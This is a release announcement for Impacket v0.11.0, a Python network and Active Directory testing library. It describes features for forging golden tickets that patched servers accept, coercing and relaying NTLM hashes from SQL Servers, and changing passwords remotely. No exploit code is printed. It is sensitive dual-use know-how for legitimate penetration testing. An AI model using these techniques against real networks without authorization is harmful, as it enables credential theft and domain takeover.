First published in coresecurity.com
We are thrilled to announce a new version of Impacket!
After months of hard work and dedication, Impacket v0.11.0 is now available and has a bunch of new and exciting features. We can’t wait for you to explore and enjoy the added capabilities that come with this version!
Let’s take a look at everything new included in this release.
What’s New in Impacket v0.11.0?
Long Live the Golden Tickets
In October 2022, Microsoft enforced the security patch KB5008380 – Authentication updates that added new safeguards in the Kerberos Privileged Attribute Certificate (PAC) and improved the validations in the authentication process. That meant that the way we used to forge tickets in Impacket didn’t work anymore. Everything changed! Would we have to say good-bye golden tickets? But fear not, our community is great.
Following the Windows reinforcement policy, @Dramelac opened PR #1391 which implemented the new PAC structure in the Impacket library and ticketer.py. Now, we can generate new golden tickets that will be accepted by fully patched servers!
Relaying Everything Everywhere
You know, we love hashes, and we love to relay them everywhere! So, for this release, we’ve updated mssqlclient.py (PR #1397), adding new commands, including the xp_dirtree option. This command allows us to coerce NTLM authentications from targeted SQL Servers, getting incoming hashes that we can then catch and relay with ntlmrelayx.py wherever we need! Thanks @Mayfly277, @trietendand @TurtleARM for your contribution to this update.
As for ntlmrelayx.py, PR#1289 made it possible to add a DNS record through LDAP, which increases the possibility of obtaining authentications from outside the local subnet. You can find out more on this in @SAERXCIT’s blogpost. Thanks @SAERXCIT for your work on this.
From this version onwards it is also possible to spawn an interactive SQL shell when relaying to MSSQL protocol (PR#1535). This is a handy way to enable launching SQL commands in the target system. Thanks @sploutchy for all your efforts.
Fresh Example Scripts
We have several new example scripts for this release:
- net.py PR#1382 mimics the net windows command, but against a remote target through the SAMR protocol. Thank you, @NtAlexio2.
- changepasswd.py (PR#1559) aims to combine password changing and resetting through different protocols. The different protocols are SMB (which was already implemented in the example smbpasswd.py, using SAMR over MS-RPC transport), Kerberos, and LDAP With this new example operators can change the password of a target user through different protocols with just one single script. This simplifies the task of changing passwords combining PR#1177, PR#1304, and PR#1189. Thanks goes to @Alef-Burzmali.
- DumpNTLMInfo.py (PR#1523)dumps remote host information in NTLM authentication model without credentials for SMB protocols (1/2/3). Thanks to @NtAlexio2.
Examples Clean Up
You will notice that some examples are showing the following banner when executed:
==============================================================================
Warning: This functionality will be deprecated in the next Impacket version
==============================================================================
With the goal of better managing the library and prioritizing the latest and most required use cases, we are tagging a select group of examples as “to be deprecated.”
We are not removing them at once, and will give the notice a version in advance to provide ample time to prepare for the change.
These are the ones marked to be deprecated in the next release:
- examples/nmapAnswerMachine.py
- examples/smbrelayx.py
- examples/smbpasswd.py (check examples/changepasswd.py – PR #1559)
There is more…
Want more? You can check out a fully detailed list of all new features and enhancements in the release notes here. Enjoy.
Getting Impacket Release v0.11.0
If you want to know more about the examples scripts and library functionality you can find it at the Impacket site or you can also get the latest stable release directly from GitHub:
To install this release, execute the following command from the directory where Impacket’s distribution has been unpacked: python3 -m pipx install.
Final Notes
As always, thanks a lot to all these contributors that make this library of Impacket Release v0.11.0 better every day (since the last version):
@ly4k, @nopernik, @snovvcrash, @_nwodtuhs, @mhskai2017, @mpgn_x64, @CT-H00K, @rmaksimov, @arossert, @aevy-syn, @tirkarthi, @podalirius, @Dramelac, @ M4yFly, @ShitSecure, @nobbd, @mr_mitm, @trietend, @TurtleARM97, @lowercase_drm, @SAERXCIT, @clavoillotte, @Marshall-Hallenbeck, @sploutchy, @almandin, @rtpt-alexanderneumann, @JerAxxxxxxx, @NtAlexio2, @laxa, @godylockz, @exploide, @jojonas, @Zamanry, @erasmusc, @bugch3ck, @ljrk0, @NaisuBanana, @shoxxdj, @Alef-Burzmali, @bransh, and @oddvarmoe.
Feedback and pull requests are very welcome. Contributions from the community are the mainstay of this open-source initiative.
If you have any doubts, questions, or suggestions, don’t hesitate to fill out our contact form.
We hope you enjoy this new release. Happy hacking!